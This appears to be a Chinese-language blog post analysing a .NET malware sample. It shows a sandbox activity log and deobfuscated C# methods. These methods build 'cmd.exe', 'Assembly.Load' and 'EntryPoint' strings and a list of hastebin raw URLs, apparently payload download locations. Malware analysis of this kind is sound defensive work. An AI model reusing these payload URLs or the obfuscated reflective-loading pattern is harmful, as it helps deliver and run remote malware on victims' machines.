09:07:43:641,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   NET_connect,    104.18.18.73:443,   protocol:(TCP)0 ,   0x00000000 [操作成功完成。  ],
09:07:44:659,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources,    filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:44:659,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources,    filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:44:659,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources,    filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:44:705,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll,    offset:0x00000000 datalen:0x00001000 ,  0x00000000 [操作成功完成。  ],
09:07:44:705,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:44:705,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:44:705,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_readdir,   C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:44:721,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:3128,  4092,   FILE_read,  C:\Users\bonelee\Desktop\99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,  offset:0x00000000 datalen:0x00001000 ,  0x00000000 [操作成功完成。  ],
09:07:44:861,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:0, 4092,   PROC_exec,  C:\Windows\SysWOW64\WerFault.exe,   target_pid:8492 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 1904' , 0x00000000 [操作成功完成。  ],
09:07:44:861,   WerFault.exe,   8492:0, 4092,   EXEC_create,    C:\Windows\SysWOW64\WerFault.exe,   parent_pid:4092 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 1904' image_base:0x0000000000A90000 image_size:0x0006F000 , 0x00000000 [操作成功完成。  ],
09:07:44:940,   WerFault.exe,   8492:8588,  4092,   FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp,  access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,    0x00000000 [操作成功完成。  ],
09:07:44:940,   WerFault.exe,   8492:8588,  4092,   FILE_read,  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp,  offset:0x00000000 datalen:0x00000002 ,  0x00000000 [操作成功完成。  ],
09:07:44:940,   WerFault.exe,   8492:8588,  4092,   FILE_remove,    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp,  ,   0x00000000 [操作成功完成。  ],
09:07:44:940,   WerFault.exe,   8492:8588,  4092,   FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp,  access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,    0x00000000 [操作成功完成。  ],
09:07:44:940,   WerFault.exe,   8492:8588,  4092,   FILE_read,  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp,  offset:0x00000000 datalen:0x00000002 ,  0x00000000 [操作成功完成。  ],
09:07:44:940,   WerFault.exe,   8492:8588,  4092,   FILE_truncate,  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp,  eof:0x00000000 ,    0x00000000 [操作成功完成。  ],
09:07:45:112,   WerFault.exe,   8492:8588,  4092,   FILE_write, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp,  offset:0x00000000 datalen:0x00000020 ,  0x00000000 [操作成功完成。  ],
09:07:45:144,   WerFault.exe,   8492:8588,  4092,   FILE_read,  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp,  offset:0x00000000 datalen:0x00000002 ,  0x00000000 [操作成功完成。  ],
09:07:45:144,   WerFault.exe,   8492:0, 4092,   FILE_modified,  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp,  ,   0x00000000 [操作成功完成。  ],
09:07:45:144,   WerFault.exe,   8492:8588,  4092,   FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp,  access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,    0x00000000 [操作成功完成。  ],
09:07:45:144,   WerFault.exe,   8492:8588,  4092,   FILE_read,  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp,  offset:0x00000000 datalen:0x00000002 ,  0x00000000 [操作成功完成。  ],
09:07:45:144,   WerFault.exe,   8492:8588,  4092,   FILE_remove,    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp,  ,   0x00000000 [操作成功完成。  ],
09:07:45:144,   WerFault.exe,   8492:8588,  4092,   FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml,  access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000001 disposition:0x00000002 options:0x00000060 ,    0x00000000 [操作成功完成。  ],
09:07:45:144,   WerFault.exe,   8492:8588,  4092,   FILE_write, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml,  offset:0x00000000 datalen:0x00000002 ,  0x00000000 [操作成功完成。  ],
09:07:45:158,   WerFault.exe,   8492:0, 4092,   EXEC_module_load,   C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51\comctl32.dll,  base:0x0000000070060000 size:0x0020F000 ,   0x00000000 [操作成功完成。  ],
09:07:45:158,   WerFault.exe,   8492:8588,  4092,   FILE_readdir,   C:\Windows\SysWOW64\drivers,    filter:'*.mrk' ,    0x00000000 [操作成功完成。  ],
09:07:45:158,   WerFault.exe,   8492:8588,  4092,   FILE_read,  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml,  offset:0x00000000 datalen:0x00000002 ,  0x00000000 [操作成功完成。  ],
09:07:45:158,   WerFault.exe,   8492:0, 4092,   FILE_modified,  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml,  ,   0x00000000 [操作成功完成。  ],
09:07:45:158,   WerFault.exe,   8492:8588,  4092,   FILE_readdir,   C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:45:158,   WerFault.exe,   8492:8588,  4092,   FILE_readdir,   C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:45:158,   WerFault.exe,   8492:8588,  4092,   FILE_readdir,   C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:45:158,   WerFault.exe,   8492:8588,  4092,   FILE_readdir,   C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:45:174,   WerFault.exe,   8492:8588,  4092,   FILE_readdir,   C:\Windows\SysWOW64\drivers,    filter:'*.mrk' ,    0x00000000 [操作成功完成。  ],
09:07:45:174,   WerFault.exe,   8492:8588,  4092,   FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp,  access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,    0x00000000 [操作成功完成。  ],
09:07:45:174,   WerFault.exe,   8492:8588,  4092,   FILE_read,  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp,  offset:0x00000000 datalen:0x00000002 ,  0x00000000 [操作成功完成。  ],
09:07:45:174,   WerFault.exe,   8492:8588,  4092,   FILE_remove,    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp,  ,   0x00000000 [操作成功完成。  ],
09:07:45:174,   WerFault.exe,   8492:8588,  4092,   FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml,  access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,    0x00000000 [操作成功完成。  ],
09:07:45:174,   WerFault.exe,   8492:8588,  4092,   FILE_write, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml,  offset:0x00000000 datalen:0x00001306 ,  0x00000000 [操作成功完成。  ],
09:07:45:174,   WerFault.exe,   8492:8588,  4092,   FILE_read,  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml,  offset:0x00000000 datalen:0x00000002 ,  0x00000000 [操作成功完成。  ],
09:07:45:174,   WerFault.exe,   8492:0, 4092,   FILE_modified,  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml,  ,   0x00000000 [操作成功完成。  ],
09:07:45:221,   WerFault.exe,   8492:6220,  4092,   FILE_readdir,   C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:45:221,   WerFault.exe,   8492:6220,  4092,   FILE_readdir,   C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:45:221,   WerFault.exe,   8492:6220,  4092,   FILE_readdir,   C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:45:221,   WerFault.exe,   8492:6220,  4092,   FILE_readdir,   C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs,  filter:'*' ,    0x00000000 [操作成功完成。  ],
09:07:45:221,   WerFault.exe,   8492:8024,  4092,   REG_mkkey,  HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData,    access:0x0002001B , 0x00000000 [操作成功完成。  ],
09:07:45:221,   WerFault.exe,   8492:8024,  4092,   REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData\ClockTimeSeconds,   type:0x0000000B datalen:8 data:'61 96 EE 64 00 00 00 00 ' , 0x00000000 [操作成功完成。  ],
09:07:45:221,   WerFault.exe,   8492:8024,  4092,   REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData\TickCount,  type:0x0000000B datalen:8 data:'0C 8F 01 00 00 00 00 00 ' , 0x00000000 [操作成功完成。  ],
09:07:45:237,   WerFault.exe,   8492:6220,  4092,   FILE_readdir,   C:\Windows\SysWOW64\drivers,    filter:'*.mrk' ,    0x00000000 [操作成功完成。  ],
09:07:45:361,   WerFault.exe,   8492:8024,  4092,   NET_connect,    52.168.117.173:443, protocol:(TCP)0 ,   0x00000000 [操作成功完成。  ],
09:07:46:393,   WerFault.exe,   8492:8588,  4092,   FILE_remove,    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp,  ,   0x00000000 [操作成功完成。  ],
09:07:46:393,   WerFault.exe,   8492:8588,  4092,   FILE_remove,    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml,  ,   0x00000000 [操作成功完成。  ],
09:07:46:393,   WerFault.exe,   8492:8588,  4092,   FILE_remove,    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml,  ,   0x00000000 [操作成功完成。  ],
09:07:46:393,   WerFault.exe,   8492:8588,  4092,   FILE_remove,    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDD.tmp.csv,  ,   0x00000000 [操作成功完成。  ],
09:07:46:393,   WerFault.exe,   8492:8588,  4092,   FILE_remove,    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EFD.tmp.txt,  ,   0x00000000 [操作成功完成。  ],
09:07:46:393,   WerFault.exe,   8492:8588,  4092,   FILE_readdir,   C:\ProgramData\Microsoft\Windows\WER\ReportQueue,   filter:'*_*_*_*_*' ,    0x00000000 [操作成功完成。  ],
09:07:46:393,   WerFault.exe,   8492:8588,  4092,   FILE_touch, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0,   access:0x00100001 alloc_size:0 attrib:0x00000080 share_access:0x00000003 disposition:0x00000002 options:0x00200021 ,    0x00000000 [操作成功完成。  ],
09:07:46:393,   WerFault.exe,   8492:8588,  4092,   FILE_read,  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0,   offset:0x00000000 datalen:0x00000002 ,  0x00000000 [操作成功完成。  ],
09:07:46:408,   WerFault.exe,   8492:8588,  4092,   FILE_touch, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0\Report.wer,    access:0x00120196 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000005 options:0x00000060 ,    0x00000000 [操作成功完成。  ],
09:07:46:408,   WerFault.exe,   8492:8588,  4092,   FILE_chmod, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0\Report.wer,    attrib:0x00002080 , 0x00000000 [操作成功完成。  ],
09:07:46:408,   WerFault.exe,   8492:8588,  4092,   FILE_write, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0\Report.wer,    offset:0x00000000 datalen:0x00000002 ,  0x00000000 [操作成功完成。  ],
09:07:46:408,   WerFault.exe,   8492:8588,  4092,   FILE_read,  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0\Report.wer,    offset:0x00000000 datalen:0x00000002 ,  0x00000000 [操作成功完成。  ],
09:07:46:408,   WerFault.exe,   8492:0, 4092,   FILE_modified,  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0\Report.wer,    ,   0x00000000 [操作成功完成。  ],
09:07:46:424,   WerFault.exe,   8492:0, 4092,   EXEC_destroy,   C:\Windows\SysWOW64\WerFault.exe,   parent_pid:4092 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 1904' , 0x00000000 [操作成功完成。  ],
09:07:46:424,   99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,   4092:0, 4092,   EXEC_destroy,   C:\Users\bonelee\Desktop\99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,  parent_pid:7920 cmdline:'C:\Users\bonelee\Desktop\99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe' ,   0x00000000 [操作成功完成。  ],

  

关键行为:

1、09:07:41:858, cmd.exe, 6308:0, 4092, EXEC_create, C:\Windows\SysWOW64\cmd.exe, parent_pid:4092 cmdline:'"C:\Windows\System32\cmd.exe" /c timeout 4.769' image_base:0x0000000000FE0000 image_size:0x00059000 , 0x00000000 [操作成功完成。 ],
2、09:07:41:952, timeout.exe, 8672:0, 4092, EXEC_create, C:\Windows\SysWOW64\timeout.exe, parent_pid:6308 cmdline:'timeout 4.769' image_base:0x0000000000020000 image_size:0x0000A000 , 0x00000000 [操作成功完成。 ],

3、创建和删除了好些临时文件:

4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp, , 0x00000000 [操作成功完成。 ],
09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml, , 0x00000000 [操作成功完成。 ],
09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml, , 0x00000000 [操作成功完成。 ],
09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDD.tmp.csv, , 0x00000000 [操作成功完成。 ],
09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EFD.tmp.txt, , 0x00000000 [操作成功完成。 ],

 

看下其代码(已经反混淆):

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
// Token: 0x06000005 RID: 5 RVA: 0x00002052 File Offset: 0x00000252
public static string smethod_2()
{
    return string.Format("{0}{1}{2}{3}", new object[]
    {
        "1",
        "7",
        "6",
        "9"
    });
}
 
// Token: 0x06000006 RID: 6 RVA: 0x000025F4 File Offset: 0x000007F4
public static string smethod_3()
{
    return string.Format("{0}{1}{2}{3}{4}{5}{6}", new object[]
    {
        "c",
        "m",
        "d",
        ".",
        "e",
        "x",
        "e"
    });
}
 
// Token: 0x06000007 RID: 7 RVA: 0x0000264C File Offset: 0x0000084C
public static string smethod_4()
{
    return string.Format("{0}{1}{2}{3}{4}{5}{6}{7}", new object[]
    {
        "A",
        "s",
        "s",
        "e",
        "m",
        "b",
        "l",
        "y"
    });
}
 
// Token: 0x06000008 RID: 8 RVA: 0x00002084 File Offset: 0x00000284
public static string smethod_5()
{
    return string.Format("{0}{1}{2}{3}", new object[]
    {
        "L",
        "o",
        "a",
        "d"
    });
}
 
// Token: 0x06000009 RID: 9 RVA: 0x000026AC File Offset: 0x000008AC
public static string smethod_6()
{
    return string.Format("{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}", new object[]
    {
        "E",
        "n",
        "t",
        "r",
        "y",
        "P",
        "o",
        "i",
        "n",
        "t"
    });
}
 
// Token: 0x0600000A RID: 10 RVA: 0x0000271C File Offset: 0x0000091C
public static string smethod_7()
{
    return string.Format("{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}{17}{18}{19}{20}{21}{22}{23}{24}{25}{26}{27}{28}{29}{30}{31}{32}{33}{34}{35}{36}{37}{38}{39}{40}{41}{42}{43}{44}{45}{46}{47}{48}{49}{50}{51}{52}{53}{54}{55}{56}{57}{58}{59}{60}{61}{62}{63}{64}{65}{66}{67}{68}{69}{70}{71}{72}{73}{74}{75}{76}{77}{78}{79}{80}{81}{82}{83}{84}{85}{86}{87}{88}{89}{90}{91}{92}{93}{94}{95}{96}{97}{98}{99}{100}{101}{102}{103}{104}{105}{106}{107}{108}{109}{110}{111}{112}{113}{114}{115}{116}{117}{118}{119}{120}{121}{122}{123}{124}{125}{126}{127}{128}{129}{130}{131}{132}{133}{134}{135}{136}{137}{138}{139}{140}{141}{142}{143}{144}{145}{146}{147}{148}{149}{150}{151}{152}{153}{154}{155}{156}{157}{158}{159}{160}{161}{162}{163}{164}{165}{166}{167}{168}{169}{170}{171}{172}{173}{174}{175}{176}{177}{178}{179}{180}{181}{182}{183}{184}{185}{186}{187}{188}{189}{190}{191}{192}{193}{194}{195}{196}{197}{198}{199}{200}{201}{202}{203}{204}{205}{206}{207}{208}{209}{210}{211}{212}{213}{214}{215}{216}{217}{218}{219}{220}{221}{222}{223}{224}{225}{226}{227}{228}{229}{230}{231}{232}{233}{234}{235}{236}{237}{238}{239}{240}{241}{242}{243}{244}{245}{246}{247}{248}{249}{250}{251}{252}{253}{254}{255}{256}{257}{258}{259}{260}{261}{262}", new object[]
    {
        "h",
        "t",
        "t",
        "p",
        "s",
        ":",
        "/",
        "/",
        "h",
        "a",
        "s",
        "t",
        "e",
        "b",
        "i",
        "n",
        ".",
        "c",
        "o",
        "m",
        "/",
        "r",
        "a",
        "w",
        "/",
        "y",
        "o",
        "n",
        "o",
        "z",
        "i",
        "l",
        "a",
        "c",
        "e",
        "@",
        "@",
        "@",
        "h",
        "t",
        "t",
        "p",
        "s",
        ":",
        "/",
        "/",
        "h",
        "a",
        "s",
        "t",
        "e",
        "b",
        "i",
        "n",
        ".",
        "c",
        "o",
        "m",
        "/",
        "r",
        "a",
        "w",
        "/",
        "u",
        "r",
        "a",
        "l",
        "a",
        "p",
        "u",
        "v",
        "u",
        "h",
        "@",
        "@",
        "@",
        "h",
        "t",
        "t",
        "p",
        "s",
        ":",
        "/",
        "/",
        "h",
        "a",
        "s",
        "t",
        "e",
        "b",
        "i",
        "n",
        ".",
        "c",
        "o",
        "m",
        "/",
        "r",
        "a",
        "w",
        "/",
        "e",
        "p",
        "u",
        "k",
        "u",
        "b",
        "a",
        "q",
        "u",
        "b",
        "@",
        "@",
        "@",
        "h",
        "t",
        "t",
        "p",
        "s",
        ":",
        "/",
        "/",
        "h",
        "a",
        "s",
        "t",
        "e",
        "b",
        "i",
        "n",
        ".",
        "c",
        "o",
        "m",
        "/",
        "r",
        "a",
        "w",
        "/",
        "o",
        "s",
        "a",
        "j",
        "o",
        "r",
        "o",
        "z",
        "i",
        "w",
        "@",
        "@",
        "@",
        "h",
        "t",
        "t",
        "p",
        "s",
        ":",
        "/",
        "/",
        "h",
        "a",
        "s",
        "t",
        "e",
        "b",
        "i",
        "n",
        ".",
        "c",
        "o",
        "m",
        "/",
        "r",
        "a",
        "w",
        "/",
        "e",
        "q",
        "e",
        "d",
        "o",
        "c",
        "e",
        "f",
        "e",
        "x",
        "@",
        "@",
        "@",
        "h",
        "t",
        "t",
        "p",
        "s",
        ":",
        "/",
        "/",
        "h",
        "a",
        "s",
        "t",
        "e",
        "b",
        "i",
        "n",
        ".",
        "c",
        "o",
        "m",
        "/",
        "r",
        "a",
        "w",
        "/",
        "a",
        "j",
        "i",
        "f",
        "u",
        "y",
        "i",
        "j",
        "e",
        "z",
        "@",
        "@",
        "@",
        "h",
        "t",
        "t",
        "p",
        "s",
        ":",
        "/",
        "/",
        "h",
        "a",
        "s",
        "t",
        "e",
        "b",
        "i",
        "n",
        ".",
        "c",
        "o",
        "m",
        "/",
        "r",
        "a",
        "w",
        "/",
        "e",
        "s",
        "u",
        "r",
        "i",
        "j",
        "a",
        "k",
        "a",
        "d"
    });
}
 
// Token: 0x0600000B RID: 11 RVA: 0x000020B6 File Offset: 0x000002B6
public static string smethod_8()
{
    return string.Format("{0}{1}{2}", new object[]
    {
        "@",
        "@",
        "@"
    });
}

  

  • smethod_2: 返回字符串 "1769"
  • smethod_3: 返回字符串 "cmd.exe"
  • smethod_4: 返回字符串 "Assembly"
  • smethod_5: 返回字符串 "Load"
  • smethod_6: 返回字符串 "EntryPoint"
  • smethod_7: 返回一个非常长的字符串,包含多次重复的 "http://haste...xyz", "http://haste...uhabqub" 和 "http://haste...ikad"
  • smethod_8: 返回一个字符串 "@@@"
posted @   bonelee  阅读(38)  评论(1编辑  收藏  举报
相关博文:
· 木马分析 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292
· 样本分析 99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d 由于.net程序配置文件缺失导致无法正常运行
· 【病毒分析】44b95162f85b81e71e5f2e7abbc904a6339ce0aa
· Advanced .Net Debugging 10:事后调试
· 文件管理和IO重定向
阅读排行:
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 记一次.NET内存居高不下排查解决与启示
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了
· DeepSeek 开源周回顾「GitHub 热点速览」
历史上的今天:
2022-08-30 Windows Sever 2008 备份与恢复
2022-08-30 Tellyouthepass勒索
2022-08-30 疑似借助用友畅捷通T+的勒索攻击爆发 火绒安全可查杀
2021-08-30 ARP协议原理——地址解析协议, 用于实现从 IP 地址到 MAC 地址的映射,即询问目标IP对应的MAC地址,ARP整个完整交互过程仅需要两个包,一问一答即可搞定
2021-08-30 LaZagne — 一键抓取目标机器上的所有明文密码,todo,自己手动试试效果
2021-08-30 SSH加密隧道流量攻击与检测技术——这玩意和思科加密流量检测没有本质区别啊,可借鉴CNN图像
2021-08-30 bt2——基于telegram的C2
点击右上角即可分享
微信分享提示